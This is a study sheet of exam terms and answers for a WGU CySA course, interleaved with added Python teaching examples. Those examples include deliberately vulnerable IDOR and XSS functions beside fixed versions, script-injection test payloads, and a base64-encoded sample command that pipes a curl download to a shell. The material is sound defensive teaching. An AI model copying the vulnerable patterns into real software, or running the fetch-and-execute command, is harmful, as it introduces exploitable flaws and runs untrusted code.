WGU D483- CySA Exam Questions With
Correct Answers
NAC (Network Access Control) - CORRECT ANSWER✔✔-Prevents users and devices from gaining access to the network until they have gone through a specific authentication method (and, in many deployments, a device posture or health check).
IDOR (Insecure Direct Object Reference) - CORRECT ANSWER✔✔-Web application flaw that occurs when developers expose an internal identifier (database key, file name, record number) and use it directly to fetch an object without checking that the requesting user is authorized for that object.
Ex. Google.com/userID-999
Google.com/userID-873
(changing the number in the URL returns another user's record)
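The flaw in the two URLs above, as an added example that is not part of the exam guide: a lookup that trusts the user ID from the URL beside a fixed version that checks the object against the session. The user table, the Forbidden exception and the function names are hypothetical.

```python
from dataclasses import dataclass


@dataclass
class User:
    user_id: int
    name: str
    email: str


# Constructed sample records standing in for a users table (not real data).
USERS = {
    873: User(873, "alice", "alice@example.com"),
    999: User(999, "bob", "bob@example.com"),
}


class Forbidden(Exception):
    """Raised when the caller is not authorized to read the object."""


def get_profile_vulnerable(requested_id: int) -> User:
    # The identifier taken from the URL (e.g. /userID-999) is used directly as
    # the database key. Any logged-in user can change the number and read
    # another account: that is the insecure direct object reference.
    return USERS[requested_id]


def get_profile_fixed(session_user_id: int, requested_id: int,
                      is_admin: bool = False) -> User:
    # Fix: authorize the object, not just the request. The requested ID is
    # honoured only if it belongs to the session user or the caller is an admin.
    if requested_id != session_user_id and not is_admin:
        raise Forbidden(f"user {session_user_id} may not read user {requested_id}")
    user = USERS.get(requested_id)
    if user is None:
        raise KeyError(requested_id)
    return user


def idor_check(session_user_id: int, victim_id: int) -> dict:
    """Show the difference: which variant hands the victim's record to the caller."""
    leaked_by_vulnerable = get_profile_vulnerable(victim_id).email
    try:
        get_profile_fixed(session_user_id, victim_id)
        leaked_by_fixed = True
    except Forbidden:
        leaked_by_fixed = False
    return {"vulnerable_leaked": leaked_by_vulnerable, "fixed_leaked": leaked_by_fixed}


if __name__ == "__main__":
    # Alice (873) tampers with the URL to ask for Bob (999).
    print(idor_check(session_user_id=873, victim_id=999))
```

In production code the forbidden and not-found paths should return the same response (typically 404) so the check itself does not become an ID enumeration oracle; they are kept distinct here only to make the behaviour visible.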
Base 64 - CORRECT ANSWER✔✔-A common encoding attackers use to obfuscate their malicious code or commands (for example, base64-encoded PowerShell passed with -EncodedCommand). Base64 output uses only the characters A-Z, a-z, 0-9, + and /, padded with = to a multiple of four characters.
EX. d2hvYW1p (the command whoami, base64-encoded). A string made only of 0-9 and a-f, such as 273218e98bd81239, is hexadecimal rather than base64.
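Telling base64 from hex and decoding both, as an added example that is not part of the exam guide. The samples are constructed stand-ins for values an analyst would pull out of a process-creation log; the function names are hypothetical. A string of only 0-9/a-f also matches the base64 alphabet, so hex is tested first.

```python
import base64
import binascii
import re

HEX_RE = re.compile(r"[0-9a-fA-F]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def classify_blob(blob: str) -> str:
    """Guess the encoding from the alphabet and length.

    Hex is checked first: a pure 0-9/a-f string would also decode as base64,
    but to meaningless bytes.
    """
    s = blob.strip()
    if HEX_RE.fullmatch(s) and len(s) % 2 == 0:
        return "hex"
    if B64_RE.fullmatch(s) and len(s) % 4 == 0:
        return "base64"
    return "unknown"


def decode_blob(blob: str) -> bytes:
    """Decode according to classify_blob(); ValueError if neither fits."""
    s = blob.strip()
    kind = classify_blob(s)
    if kind == "hex":
        return binascii.unhexlify(s)
    if kind == "base64":
        return base64.b64decode(s, validate=True)
    raise ValueError(f"not hex or base64: {blob!r}")


def decode_powershell_encoded_command(b64: str) -> str:
    """powershell.exe -EncodedCommand takes base64 of the script as UTF-16LE,
    so a plain UTF-8 decode would show every other byte as NUL."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


# Constructed samples (not taken from any real incident).
SAMPLE_HEX = "77686f616d69"  # hex of b"whoami"
SAMPLE_B64 = base64.b64encode(b"curl http://example.invalid/a | sh").decode()
SAMPLE_PS = "VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA="  # "Write-Host hi" as UTF-16LE

if __name__ == "__main__":
    for sample in (SAMPLE_HEX, SAMPLE_B64):
        print(classify_blob(sample), decode_blob(sample))
    print(decode_powershell_encoded_command(SAMPLE_PS))
```

`validate=True` makes `b64decode` reject characters outside the alphabet instead of silently discarding them, which matters when a log field has been truncated or wrapped.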
Cyber Kill Chain - CORRECT ANSWER✔✔-A systematic outline of the steps of a cyberattack, introduced at Lockheed Martin in 2011. Its seven phases are reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives.
MITRE ATT&CK Framework - CORRECT ANSWER✔✔-A knowledge base maintained by the MITRE Corporation that catalogs and explains observed adversary tactics, techniques, and procedures (TTPs). The name stands for Adversarial Tactics, Techniques, and Common Knowledge.
Passive Scanning - CORRECT ANSWER✔✔-Type of scanning that describes indirect methods of assessment, such as inspecting the flow of traffic and the protocols already on the network, without sending probe packets to the targets.
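What "inspecting the flow of traffic" yields in practice, as an added example that is not part of the exam guide: a service inventory built only from observed flow records, with no packet sent to the hosts. The flow records are constructed, and the port heuristic and function names are the example's own assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


# Constructed flow records (not captured traffic), shaped like the summary a
# flow collector or a Zeek conn.log would give an analyst.
FLOWS = [
    Flow("10.0.0.5", 51234, "10.0.0.10", 22, "tcp"),
    Flow("10.0.0.10", 22, "10.0.0.5", 51234, "tcp"),  # return direction
    Flow("10.0.0.6", 40001, "10.0.0.10", 80, "tcp"),
    Flow("10.0.0.5", 51300, "10.0.0.11", 23, "tcp"),
    Flow("10.0.0.7", 53000, "10.0.0.12", 53, "udp"),
]

WELL_KNOWN = {22: "ssh", 23: "telnet", 53: "dns", 80: "http", 443: "https"}
CLEARTEXT_PORTS = {21, 23, 80}


def passive_inventory(flows):
    """Infer which hosts offer which services purely from observed flows.

    Heuristic: the endpoint using the lower port number is the server, since
    client-side ephemeral ports are high. Both directions of a connection
    therefore collapse onto the same (server, proto, port) entry.
    """
    services = defaultdict(set)
    for f in flows:
        if f.dport <= f.sport:
            services[f.dst].add((f.proto, f.dport))
        else:
            services[f.src].add((f.proto, f.sport))
    return {host: sorted(ports) for host, ports in sorted(services.items())}


def cleartext_findings(inventory):
    """Flag services whose protocol carries credentials in the clear."""
    return sorted(
        (host, port, WELL_KNOWN.get(port, "unknown"))
        for host, ports in inventory.items()
        for _proto, port in ports
        if port in CLEARTEXT_PORTS
    )


if __name__ == "__main__":
    inv = passive_inventory(FLOWS)
    for host, ports in inv.items():
        print(host, ports)
    print(cleartext_findings(inv))
```

The trade-off is the one the exam definition hints at: passive assessment only sees services someone actually talked to during the capture window, so a listening but idle port stays invisible until an active scan is run.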
ScoutSuite - CORRECT ANSWER✔✔-An open source cloud security auditing tool that can work across commonly used cloud environments (AWS, Azure and GCP among them) by querying the provider APIs and reporting misconfigurations.
OWASP (Open Web Application Security Project; renamed the Open Worldwide Application Security Project in 2023) - CORRECT ANSWER✔✔-An online community dedicated to web application security. It produces freely available articles, methodologies, documentation, tools, and technologies that describe web application flaws and ways to address and correct them (the OWASP Top 10, for example).
JSON (JavaScript Object Notation) - CORRECT ANSWER✔✔-A lightweight, text-based format for structured data. Compared with XML it is less verbose and simpler to parse, which makes it well suited to exchanging large data sets and to web APIs.
OSSTMM (Open Source Security Testing Methodology Manual) - CORRECT ANSWER✔✔-A methodology published by ISECOM that provides a comprehensive framework for testing operational security across networks, systems, and the physical and human channels. Its process includes identifying system assets, building threat models, and performing vulnerability assessment.
ZAP (Zed Attack Proxy) - CORRECT ANSWER✔✔-A widely used open source web application security scanner and intercepting proxy, originally developed as an OWASP project.
Diamond Model of Intrusion Analysis - CORRECT ANSWER✔✔-A framework for analyzing cybersecurity incidents and intrusions by exploring the relationships between four core features: adversary, capability, infrastructure, and victim.
Output encoding - CORRECT ANSWER✔✔-One of the primary defensive techniques against cross-site scripting (XSS). By ensuring that user input displayed on a web page is treated as data rather than executable code, output encoding prevents the execution of malicious script. The encoding must match the context the data is written into (HTML body, HTML attribute, JavaScript, URL), since each context has different characters that break out of it.
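Output encoding for three contexts, as an added example that is not part of the exam guide: a reflected comment rendered raw beside the encoded version, an attribute value, and a value dropped into a script block. The payloads are constructed and the function names are hypothetical; the encoders use only the Python standard library.

```python
import html
import json


def render_comment_vulnerable(comment: str) -> str:
    # User input written straight into the HTML body: a <script> tag executes.
    return f'<p class="comment">{comment}</p>'


def render_comment_encoded(comment: str) -> str:
    # HTML-entity encode for the body context: < > & " ' become entities, so
    # the browser shows the text literally and never parses it as markup.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute(value: str) -> str:
    # Attribute context: the value must be quoted AND quote characters encoded,
    # otherwise  " onmouseover="...  closes the attribute and adds a handler.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_js_value_vulnerable(value: str) -> str:
    # Script context with only quotes around the value: </script> inside the
    # string ends the block early and whatever follows is parsed as markup.
    return f'<script>var q = "{value}";</script>'


def render_js_value(value: str) -> str:
    # json.dumps escapes quotes and backslashes; additionally escaping "<"
    # as \u003c keeps </script> from ever appearing inside the literal.
    safe = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var q = {safe};</script>"


# Constructed test payloads, one per context.
PAYLOAD = "<script>alert(1)</script>"
ATTR_PAYLOAD = '" onmouseover="alert(1)'
JS_PAYLOAD = "</script><script>alert(1)</script>"

if __name__ == "__main__":
    print(render_comment_vulnerable(PAYLOAD))
    print(render_comment_encoded(PAYLOAD))
    print(render_attribute(ATTR_PAYLOAD))
    print(render_js_value_vulnerable(JS_PAYLOAD))
    print(render_js_value(JS_PAYLOAD))
```

The same input needs a different encoder in each context; applying HTML-entity encoding to a value inside a script block, or none at all inside an attribute, leaves the XSS intact.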